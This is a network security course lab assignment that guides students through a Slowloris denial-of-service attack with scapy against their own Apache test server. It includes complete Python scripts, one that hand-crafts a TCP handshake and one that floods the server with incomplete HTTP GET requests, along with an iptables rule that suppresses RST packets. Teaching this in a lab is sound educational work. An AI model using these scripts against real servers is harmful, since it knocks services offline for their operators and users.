CNIT 123 Project X12: Slow Loris Attack with scapy (20 pts.)

What you need

Finding the IP Address of the Target Linux Machine

On the Target Linux machine, in the Terminal window, execute the ifconfig command. Make a note of your IP address for later reference.

Restarting Apache on the Target Linux Machine

On the Target Linux machine, in the Terminal window, execute this command:

service apache2 restart

Watching Network Connections on the Target Linux Machine

On the Web Server machine, close Firefox. In the Terminal window, execute this command:
watch "netstat -pant"
You should see a continuously updated list of network connections, as shown below on this page. Right now, there are no ESTABLISHED connections, only a listening process.

Viewing the Web Page from the Attacker Machine

On the Attacker Linux machine, open Firefox. In the Address bar, type the IP address of your Target Linux Machine. You should see the default Web page for your Apache server, as shown below on this page.

On your Target Linux machine, you should see an ESTABLISHED connection to the server on local port 80, as shown below on this page. If you don't see it, try refreshing the browser on the Attacker Linux machine.

Blocking ACK Packets on the Attacker Linux Machine

As before, you must block ACK packets with iptables.

On the Attacker Linux Machine, open a Terminal window. In the Terminal window, execute this command:

iptables -L
If you see a rule in the OUTPUT section that drops RST packets, as shown below on this page, your firewall is correctly configured. If the rule is not there, execute this command to add it:
iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

Creating a Handshake Function on the Attacker Linux Machine

On the Attacker Linux machine, in a Terminal window, execute these commands:
cd

nano handshake.py

In the nano window, type (or copy and paste) this script:

#!/usr/bin/env python
import sys
from scapy.all import *

if len(sys.argv) != 3:
  print "Usage: ./handshake.py <target-ip> <source-port>"
  sys.exit(1)

target = sys.argv[1]
sp = int(sys.argv[2])

i = IP()
i.dst = target
print "IP layer prepared: ", i.summary()

t = TCP()
t.dport = 80
t.sport = sp
t.flags = "S"
print "Sending TCP SYN Packet: ", t.summary()
ans = sr1(i/t)
print "Reply was: ",ans.summary()

t.seq = ans.ack
t.ack = ans.seq + 1
t.flags = "A"
print "Sending TCP ACK Packet: ", t.summary()
ans = sr(i/t/"X")

Here is an image of the script:

Save the file with Ctrl+X, Y, Enter.

On the Attacker Linux machine, in the Terminal window, execute these commands. In the second command, replace the IP address with the address of your Linux Target machine:

chmod a+x handshake.py

./handshake.py 192.168.198.133 2000

On the Target Linux machine, you should see a connection from local port 80 to remote port 2000 appear. At first, it is in the ESTABLISHED state, but it rapidly changes to a FIN-WAIT state, as shown below on this page. Capture a screen image before the connection vanishes. If it vanishes before you can get the image, just repeat the ./handshake.py 192.168.198.133 2000 command again.

Saving the Screen Image

Make sure you can see the ESTABLISHED or FIN-WAIT connection, from local port 80 to remote port 2000.

Save a screen image with the filename Proj X12a from Your Name.

Watching Server Status on the Target Linux Machine

On the Target Linux machine, open a new Terminal window, and execute this command:
firefox localhost/server-status
You should see the Apache server status page, with only one request being processed, as shown below on this page:

Creating a Slowloris Function on the Attacker Linux Machine

On the Attacker Linux machine, in a Terminal window, execute this command:
nano slowloris.py
In the nano window, type (or copy and paste) this script. Replace YOUR NAME with your own name.
#!/usr/bin/env python
import sys
from scapy.all import *

if len(sys.argv) != 4:
  print "Usage: ./slowloris.py <target-ip> <starting-source-port> <number-of-GETs>"
  sys.exit(1)

target = sys.argv[1]
sp = int(sys.argv[2])
numgets = int(sys.argv[3])

print "Welcome to YOUR NAME's Slow Loris Attack with scapy!"
print "Attacking ", target, " with ", numgets, " GETs"

i = IP()
i.dst = target
print "IP layer prepared: ", i.summary()

for s in range(sp, sp+numgets-1):
  t = TCP()
  t.dport = 80
  t.sport = s
  t.flags = "S"
  ans = sr1(i/t, verbose=0)
  t.seq = ans.ack
  t.ack = ans.seq + 1
  t.flags = "A"
  get = "GET / HTTP/1.1\r\nHost: " + target
  ans = sr1(i/t/get, verbose=0)
  print "Port ", s, " attacked!"
print "Done!"
 
The script looks like this (split across two images):

This script is very similar to the handshake.py script. The only changes are that it sends an HTTP GET each time, which is incomplete because it is missing the final carriage return and line feed, and that it loops through many source ports.

On the Attacker Linux machine, in the Terminal window, execute these commands. In the second command, replace the IP address with the address of your Linux Target machine:

chmod a+x slowloris.py

./slowloris.py 192.168.198.133 3000 1000

On the Target Linux machine, in the Firefox window, click the Refresh button every few seconds. The grid should be filling with letters, as the attack uses up all available connections.

Your screen should look like the image below on this page:

Saving the Screen Image

Make sure you can see the grid, showing at least 10 letters.

Save a screen image with the filename Proj X12b from Your Name.

Turning in Your Project

Email the images to cnit.123@gmail.com with a Subject line of Proj X12 from Your Name.


Sources

http://packetstorm.linuxsecurity.com/papers/general/blackmagic.txt

http://wikihead.wordpress.com/2011/01/09/packet-crafting-using-scapy/

http://blog.facilelogin.com/2010/12/hand-crafting-tcp-handshake-with-scapy.html


Last modified: 5-3-14
Modified 6-28-16